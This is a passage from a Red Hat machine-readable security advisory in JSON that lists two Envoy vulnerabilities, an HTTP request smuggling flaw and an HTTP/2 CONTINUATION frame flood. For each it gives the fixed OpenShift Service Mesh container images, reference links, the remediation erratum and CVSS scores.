}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-23326",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2024-01-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2259228"
}
],
"notes": [
{
"category": "description",
"text": "A possible request smuggling vulnerability exists through Envoy. This issue occurs if a server can be tricked into adding an upgrade header into a response.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-23326"
},
{
"category": "external",
"summary": "RHBZ#2259228",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259228"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-23326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23326"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-23326",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23326"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode"
},
{
"acknowledgments": [
{
"names": [
"Bartek Nowotarski"
],
"organization": "nowotarski.info"
}
],
"cve": "CVE-2024-30255",
"cwe": {
"id": "CWE-390",
"name": "Detection of Error Condition Without Action"
},
"discovery_date": "2024-04-02T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2272986"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in how Envoy Proxy implements the HTTP/2 codec. There are insufficient limitations placed on the amount of CONTINUATION frames that can be sent within a single stream. This issue could allow an unauthenticated remote attacker to send packets to vulnerable servers, which could use up compute resources to cause a Denial of Service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat rates the security impact of this vulnerability as Moderate, in alignment with upstream Envoy. The worst case scenario is excessive CPU utilization causing a denial of service. Once an attack has ended, the system should return to normal operations on its own.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-30255"
},
{
"category": "external",
"summary": "RHBZ#2272986",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2272986"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-30255",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30255"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-30255",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30255"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm"
},
{
"category": "external",
"summary": "https://nowotarski.info/http2-continuation-flood/",
"url": "https://nowotarski.info/http2-continuation-flood/"
},
{
"category": "external",
"summary": "https://www.kb.cert.org/vuls/id/421644",
"url": "https://www.kb.cert.org/vuls/id/421644"
}
],
"release_date": "2024-04-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
